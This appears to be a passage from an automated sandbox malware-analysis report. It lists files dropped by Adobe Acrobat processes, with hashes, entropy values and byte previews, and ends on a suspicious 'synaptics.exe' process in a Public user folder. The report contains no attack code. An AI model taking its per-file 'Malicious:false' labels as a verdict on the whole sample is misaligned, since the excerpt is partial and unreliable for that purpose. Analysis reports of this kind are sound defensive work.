                                                                                                                                                                                      SHA-256:595B516C72E580ACB5A75E8C23D20339F690093420D026476F41782B050403AB
                                                                                                                                                                                      SHA-512:F2DAEA869B3DCBB97542AD141A617DC8ADC64F195C0D6BD9D743328FA9D4728E87169C515FF65C8191D31BE963C39500C5AA48924D30D43BD52B36E59FAA8E38
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:.... .c................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:Certificate, Version=3
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1391
                                                                                                                                                                                      Entropy (8bit):7.705940075877404
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                                                                                                                      MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                                                                                                                      SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                                                                                                                      SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                                                                                                                      SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):71954
                                                                                                                                                                                      Entropy (8bit):7.996617769952133
                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                      SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                      MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                      SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                      SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                      SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):192
                                                                                                                                                                                      Entropy (8bit):2.7425532007658724
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:kkFklwSNhtfllXlE/HT8kmjlXNNX8RolJuRdxLlGB9lQRYwpDdt:kKp+heT8b7NMa8RdWBwRd
                                                                                                                                                                                      MD5:206C3CAA827AD11289C438432687B95B
                                                                                                                                                                                      SHA1:68DBCD381133348FC419A98EDE459D195E9535BC
                                                                                                                                                                                      SHA-256:07BCF31798C601460C95D29CF311570C0DF0E4B391B30465E0714F7491937343
                                                                                                                                                                                      SHA-512:06B629E959B57A0B0AFB94EBC454F7D9CFF7164EB8B63E3561FE01B6B259A1390F52B60C62599C7135460075BF1D3760517472CFF363D1E945814CBAEE633972
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:p...... ........Cwh%.5..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:modified
                                                                                                                                                                                      Size (bytes):328
                                                                                                                                                                                      Entropy (8bit):3.2418003062782916
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:kKlrtL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:1tiDImsLNkPlE99SNxAhUe/3
                                                                                                                                                                                      MD5:4010716998612EC350FC6B23B3CE90D6
                                                                                                                                                                                      SHA1:0B2E4060958B19C21D2929ABAC737F099B10C7EE
                                                                                                                                                                                      SHA-256:FF1D82BDDDA6787061B6E8AC5DAA37F92A0B0931EEC3472399F88C994D1F5B6E
                                                                                                                                                                                      SHA-512:7049B4B7F82DF94A1C5FBDCA96680B4295C3369987469078D314DF49B53782E6F0585B61471B6770F3C179EAE296D65AEB54AB526AAE29EC1121867F81F375D4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:p...... ...........7.5..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                      File Type:PostScript document text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1233
                                                                                                                                                                                      Entropy (8bit):5.233980037532449
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                                                                                                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                                                                                                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                                                                                                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                                                                                                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                      File Type:PostScript document text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1233
                                                                                                                                                                                      Entropy (8bit):5.233980037532449
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                                                                                                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                                                                                                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                                                                                                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                                                                                                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                      File Type:PostScript document text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1233
                                                                                                                                                                                      Entropy (8bit):5.233980037532449
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                                                                                                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                                                                                                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                                                                                                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                                                                                                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                      File Type:PostScript document text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10880
                                                                                                                                                                                      Entropy (8bit):5.214360287289079
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                                                                                                      MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                                                                                                      SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                                                                                                      SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                                                                                                      SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                      File Type:PostScript document text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10880
                                                                                                                                                                                      Entropy (8bit):5.214360287289079
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                                                                                                      MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                                                                                                      SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                                                                                                      SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                                                                                                      SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):227002
                                                                                                                                                                                      Entropy (8bit):3.392780893644728
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:qKPC4iyzDtrh1cK3XEivK7VK/3AYvYwgF/rRoL+sn:XPCaJ/3AYvYwglFoL+sn
                                                                                                                                                                                      MD5:265E3E1166312A864FB63291EA661C6A
                                                                                                                                                                                      SHA1:80DFF3187FF929596EB22E1DB9021BAD6F97178C
                                                                                                                                                                                      SHA-256:C13E08B1887A4E44DC39609D7234E8D732A6BC11313B55D6F4ECFB060CD87728
                                                                                                                                                                                      SHA-512:48776A2BFE8F25E5601DCC0137F7AB103D5684517334B806E3ACF61683DD9B283828475FC85CE0CBE4E8AF88E6F8B25EED0A77640E2CFFF2CC73708726519AFA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:Adobe Acrobat Reader (64-bit) 23.6.20320....?A12_AV2_Search_18px.............................................................................................................KKK KKK.KKK.KKK.KKK.KKK.KKK@........................................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.............................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.........................KKK.KKK.KKK.KKK0....................KKK.KKK.KKK.KKK`....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK.KKK.....................................KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK.KKK@....................KKK.KKK.KKK.KKK`........................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.KKK.............................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4
                                                                                                                                                                                      Entropy (8bit):0.8112781244591328
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:e:e
                                                                                                                                                                                      MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                                                                                                      SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                                                                                                      SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                                                                                                      SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:....
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2145
                                                                                                                                                                                      Entropy (8bit):5.081760885049019
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:YbYAiESAuYCjWbj2CjxjZ4oijxi+0jPjrVbjBgajF:OKDWP2ERaTx3y7BPBgMF
                                                                                                                                                                                      MD5:68818DB443C996DA67271C1197B1536C
                                                                                                                                                                                      SHA1:CDBB9AE35F73145396E8C106927AB1314272D38A
                                                                                                                                                                                      SHA-256:BD0BE4F9A99628F7FF34E6930F109A1178FED1FD35648CBC9C79CDD0BEC34030
                                                                                                                                                                                      SHA-512:BF7603B680665EB634BD4153E967CEBC1D000A328E7CD9032263DD0B91BC93933515819099C2917056DAB15077DFBF00E17FB514ACA0A779524BB5924B498182
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:{"all":[{"id":"TESTING","info":{"dg":"DG","sid":"TESTING"},"mimeType":"file","size":4,"ts":1731420410000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"f44756c6e08822e64c0e471a2499e34d","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1696585148000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"e8f53b6740aba22a83a1a569cebedbcc","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696585148000},{"id":"DC_FirstMile_Right_Sec_Surface","info":{"dg":"cc1faa6a0c714f2f0c497731f1772fa2","sid":"DC_FirstMile_Right_Sec_Surface"},"mimeType":"file","size":294,"ts":1696585143000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"ab062dea95f25ef019cc2f5f5f0121d4","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696583346000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"65580efad4bc88b91040ff50d71bfae9","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1255,"ts":1696583346000},{"id":"DC_Reader_Edit_LHP_Banner"
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):12288
                                                                                                                                                                                      Entropy (8bit):0.9880338805942168
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:TLHRx/XYKQvGJF7urs67Y9QmQ6QeITohIcLESiAieP0hF:TVl2GL7ms67YXtrKcI8E
                                                                                                                                                                                      MD5:0B78D58ED4A672D5ABE29681418CF0B9
                                                                                                                                                                                      SHA1:0DEE643E1FDEC808D6FEFDF2190DA8E6AA846FCA
                                                                                                                                                                                      SHA-256:42FD40BFB82A3C8C0FE365A6085D7050543AD6C774D8F82414612891C473B4A1
                                                                                                                                                                                      SHA-512:A399D73EC13AB99BC61491D20E8E247DE8952C9D3612BFFC2D1C05B0495B12B7486E576406FC3A74A55339D88B3490BECD5C6B733308BE1A7914ACC590C1FEEB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                      File Type:SQLite Rollback Journal
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8720
                                                                                                                                                                                      Entropy (8bit):1.3427706244017155
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:7+tdnASY9QmQ6QeIToh7cLESiAi0mY9QjqLBx/XYKQvGJF7ursN:7MhlYXtrFcI8KYiqll2GL7msN
                                                                                                                                                                                      MD5:4478CEE3185AADB3E923B344F5F4894B
                                                                                                                                                                                      SHA1:222D79BCEC6DD58D39F2B9348B1380A7714D115F
                                                                                                                                                                                      SHA-256:381DE7792AFF73B35F851E449F642C0A9643507D7FA586464B5CFF185EF7F656
                                                                                                                                                                                      SHA-512:84DBA58B6FDB13C7BA61DE0EF40DAD953F0E3C5D5838971042E252B49EE3A53E23C78EEF01AAC3207EDA09FFE65A2A567F3B581E98B5980C234D7F9DD5E75FED
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:.... .c.....R.o.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):66726
                                                                                                                                                                                      Entropy (8bit):5.392739213842091
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:RNOpblrU6TBH44ADKZEghN1HTBMFHkjzZcaNxNEgceFYyu:6a6TZ44ADEhNFTBMVkXEJ2K
                                                                                                                                                                                      MD5:5F6BE532351775C9436627609334148F
                                                                                                                                                                                      SHA1:39DFE2D3D793E890AB1376C67CE6E5692F8C2F3E
                                                                                                                                                                                      SHA-256:03115F9DD9A15FA6633630B44011A50A841973A0FBCEC76AED97051D29D614AC
                                                                                                                                                                                      SHA-512:6D545F6DD1AAA860BFBC919006C277BE00BEC4CAF67A6F38FB349161285E83F98E4429A5E8AEC23CB0D477B1151233F3AD0F4D4634D98604F3351E7E47114375
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
